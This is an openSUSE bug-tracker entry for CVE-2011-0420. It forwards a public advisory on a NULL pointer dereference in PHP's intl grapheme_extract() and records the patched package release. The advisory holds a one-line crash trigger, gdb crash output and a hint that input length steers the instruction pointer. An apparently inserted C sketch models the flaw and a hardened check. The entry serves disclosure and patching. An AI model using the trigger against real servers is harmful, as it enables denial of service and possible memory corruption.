Bugzilla – Bug 672933
VUL-1: CVE-2011-0420: php5: grapheme_extract() NULL Pointer Dereference
Last modified: 2020-05-18 11:52:26 UTC
Hi. There is a security bug in package 'php5'. This information is from 'full-disclosure'. This bug is public. There is no coordinated release date (CRD) set.

More information can be found here: http://securityreason.com/

CVE number: CVE-2011-0420
CVE description: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0420

Original posting:

---------- Forwarded message ----------
Subject: [Full-disclosure] PHP 5.3.5 grapheme_extract() NULL Pointer Dereference
Date: Thursday 17 February 2011
From: Maksymilian Arciemowicz <cxib@securityreason.com>
To: full-disclosure@lists.grok.org.uk

[ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- Dis.: 09.12.2010
- Pub.: 17.02.2011

CVE: CVE-2011-0420
CERT: VU#210829

Affected Software:
- PHP 5.3.5

Fixed: SVN

Original URL:
http://securityreason.com/achievement_securityalert/94

--- 0. Description ---
Internationalization extension (hereafter referred to as Intl) is a wrapper for the ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts.

grapheme_extract - Function to extract a sequence of default grapheme clusters from a text buffer, which must be encoded in UTF-8.

--- 1. PoC for grapheme_extract() ---

    grapheme_extract('a',-1);

Change the length of the first parameter to change rip.

--- 2. grapheme_extract() NULL Pointer Dereference ---
As we can see in grapheme_extract(str,size)

--grapheme_extract()--
    ..
    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char **)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) {  <=== str='a' and size='-1'
    ..
    /* if the string is all ASCII up to size+1 - or str_len whichever is first - then we are done.
       (size + 1 because the size-th character might be the beginning of a grapheme cluster) */

    if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 : str_len ) ) {  <=== ( size=-1+1=0 )

        long nsize = ( size < str_len ? size : str_len );  <=== nsize = -1

        if ( NULL != next ) {
            ZVAL_LONG(next, start+nsize);
        }

        RETURN_STRINGL(((char *)pstr), nsize, 1);  <=== CRASH POINT
    }
    ..
--grapheme_extract()--

if we call grapheme_ascii_check(pstr,0), where

--grapheme_ascii_check()--
    /* {{{ grapheme_ascii_check: ASCII check */
    int grapheme_ascii_check(const unsigned char *day, int32_t len)  <==== len=0
    {
        int ret_len = len;
        while ( len-- ) {
            if ( *day++ > 0x7f )
                return -1;
        }

        return ret_len;  <=== return 0
    }
--grapheme_ascii_check()--

then we get (int)0 as the result and

    long nsize = ( size < str_len ? size : str_len );

will be -1. Therefore,

    RETURN_STRINGL(((char *)pstr), nsize, 1);

gives a NULL pointer dereference here. Changing the length of the first parameter of grapheme_extract(), we also change rip in memcpy(3).

    (gdb) r -r 'grapheme_extract('a',-1);'
    ..
    (gdb) x/i $rip
    => 0x7ffff5511d99 <memcpy+777>: mov %rax,(%rdi)
    (gdb) x/x $rax
    0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70
    (gdb) x/x $rdi
    0x11b2000: Cannot access memory at address 0x11b2000

    (gdb) r -r 'grapheme_extract('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',-1);'
    ..
    (gdb) x/i $rip
    => 0x7ffff5511d77 <memcpy+743>: mov 0x18(%rsi),%r10
    (gdb) x/x $rsi
    0x11b1fe8: 0x00000000

--- 3. Fix ---
CVS
http://svn.php.net/viewvc?view=revision&revision=306449

--- 4. Greets ---
Pierre, Stas, sp3x, infospec

--- 5. Contact ---
Author: Maksymilian Arciemowicz [ SecurityReason.com ]
Email:
- cxib {a\./t]securityreason[d=t} com
GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://cxib.net/

--
Best Regards
pub 4096R/D6E5B530 2010-09-19
uid Maksymilian Arciemowicz (cx) <max@cxib.net>
sub 4096R/58BA663C 2010-09-19
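The negative-length path the advisory walks through, as an added example (my own code, not the PHP extension's source or the upstream fix): a copy of the quoted grapheme_ascii_check(), a hypothetical model of the ASCII fast path (vulnerable_nsize) showing how size=-1 slips through the length-0 check and reaches the copy as nsize=-1, and a hardened variant (hardened_nsize, an assumption for illustration) that rejects a negative size before any length arithmetic.

```c
#include <stdint.h>
#include <stdio.h>

/* Copy of grapheme_ascii_check() as quoted in the advisory: returns len when
 * every byte is 7-bit ASCII, -1 otherwise.  With len == 0 the loop body never
 * runs, so it returns 0 without inspecting the buffer at all. */
int grapheme_ascii_check(const unsigned char *day, int32_t len)
{
    int ret_len = len;
    while (len--) {
        if (*day++ > 0x7f) return -1;
    }
    return ret_len;
}

/* Hypothetical model of the ASCII fast path in the quoted grapheme_extract():
 * returns the nsize that would reach RETURN_STRINGL, or -2 when the fast
 * path is not taken (the ICU break-iterator path is not modelled). */
long vulnerable_nsize(const char *str, long str_len, long size)
{
    int32_t check_len = size + 1 < str_len ? size + 1 : str_len;
    if (-1 != grapheme_ascii_check((const unsigned char *)str, check_len)) {
        return size < str_len ? size : str_len;   /* -1 when size == -1 */
    }
    return -2;
}

/* Hardened variant (an assumption, not necessarily the upstream fix): refuse a
 * negative size before any length arithmetic.  Returns 0 if the arguments are
 * rejected, 1 if the fast path produced *nsize, 2 if the slow path must run. */
int hardened_nsize(const char *str, long str_len, long size, long *nsize)
{
    if (size < 0 || str_len < 0) {
        return 0;                      /* PHP would warn and return false */
    }
    long r = vulnerable_nsize(str, str_len, size);
    if (r == -2) return 2;
    *nsize = r;
    return 1;
}

int main(void)
{
    long n = vulnerable_nsize("a", 1, -1), h = 0;
    /* The negative length turns into a huge size_t at the memcpy(3) call. */
    printf("nsize=%ld, as size_t=%zu\n", n, (size_t)n);
    printf("hardened status=%d\n", hardened_nsize("a", 1, -1, &h));
    return 0;
}
```

Note that a non-ASCII input with size=-1 takes the same path, because a length-0 check never looks at the bytes.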
p5->p3 mass change
Re: PHP 5.3.5 grapheme_extract() NULL Pointer Dereference
From: Marcin Orlowski <carlos@wfmh.org.pl>
To: bugtraq@securityfocus.com

On Wed, 16 Feb 2011 16:11:23 -0700 cxib wrote:
> Affected Software:
> - PHP 5.3.5

grapheme is neither part of PHP core, nor a built-in PHP extension, therefore the above is false as the bug is not in PHP itself. People using PHP 5.3.5 but not using grapheme (some distros like Debian and derivatives offer this extension under the name "php5-intl") are not vulnerable.

Regards,
--
"Daddy, what "Formatting drive C:" means?"...
Marcin
http://wfmh.org.pl/carlos/
We distribute php5-intl package only for 5.3 branch, that means 11.2, 11.3, 11.4 and Factory.
The php update from swamp 37389 is still running. What about including this bug?
Fine with me.
Please take a look at the following submit requests:
11.2 #63641
11.3 #63642

Petr
Update released for: apache2-mod_php5, apache2-mod_php5-debuginfo, php5, php5-bcmath, php5-bcmath-debuginfo, php5-bz2, php5-bz2-debuginfo, php5-calendar, php5-calendar-debuginfo, php5-ctype, php5-ctype-debuginfo, php5-curl, php5-curl-debuginfo, php5-dba, php5-dba-debuginfo, php5-debuginfo, php5-debugsource, php5-devel, php5-dom, php5-dom-debuginfo, php5-enchant, php5-enchant-debuginfo, php5-exif, php5-exif-debuginfo, php5-fastcgi, php5-fastcgi-debuginfo, php5-fileinfo, php5-fileinfo-debuginfo, php5-ftp, php5-ftp-debuginfo, php5-gd, php5-gd-debuginfo, php5-gettext, php5-gettext-debuginfo, php5-gmp, php5-gmp-debuginfo, php5-hash, php5-hash-debuginfo, php5-iconv, php5-iconv-debuginfo, php5-imap, php5-imap-debuginfo, php5-intl, php5-intl-debuginfo, php5-json, php5-json-debuginfo, php5-ldap, php5-ldap-debuginfo, php5-mbstring, php5-mbstring-debuginfo, php5-mcrypt, php5-mcrypt-debuginfo, php5-mysql, php5-mysql-debuginfo, php5-odbc, php5-odbc-debuginfo, php5-openssl, php5-openssl-debuginfo, php5-pcntl, php5-pcntl-debuginfo, php5-pdo, php5-pdo-debuginfo, php5-pear, php5-pgsql, php5-pgsql-debuginfo, php5-phar, php5-phar-debuginfo, php5-posix, php5-posix-debuginfo, php5-pspell, php5-pspell-debuginfo, php5-readline, php5-readline-debuginfo, php5-shmop, php5-shmop-debuginfo, php5-snmp, php5-snmp-debuginfo, php5-soap, php5-soap-debuginfo, php5-sockets, php5-sockets-debuginfo, php5-sqlite, php5-sqlite-debuginfo, php5-suhosin, php5-suhosin-debuginfo, php5-sysvmsg, php5-sysvmsg-debuginfo, php5-sysvsem, php5-sysvsem-debuginfo, php5-sysvshm, php5-sysvshm-debuginfo, php5-tidy, php5-tidy-debuginfo, php5-tokenizer, php5-tokenizer-debuginfo, php5-wddx, php5-wddx-debuginfo, php5-xmlreader, php5-xmlreader-debuginfo, php5-xmlrpc, php5-xmlrpc-debuginfo, php5-xmlwriter, php5-xmlwriter-debuginfo, php5-xsl, php5-xsl-debuginfo, php5-zip, php5-zip-debuginfo, php5-zlib, php5-zlib-debuginfo

Products:
openSUSE 11.2 (debug, i586, x86_64)
openSUSE 11.3 (debug, i586, x86_64)
released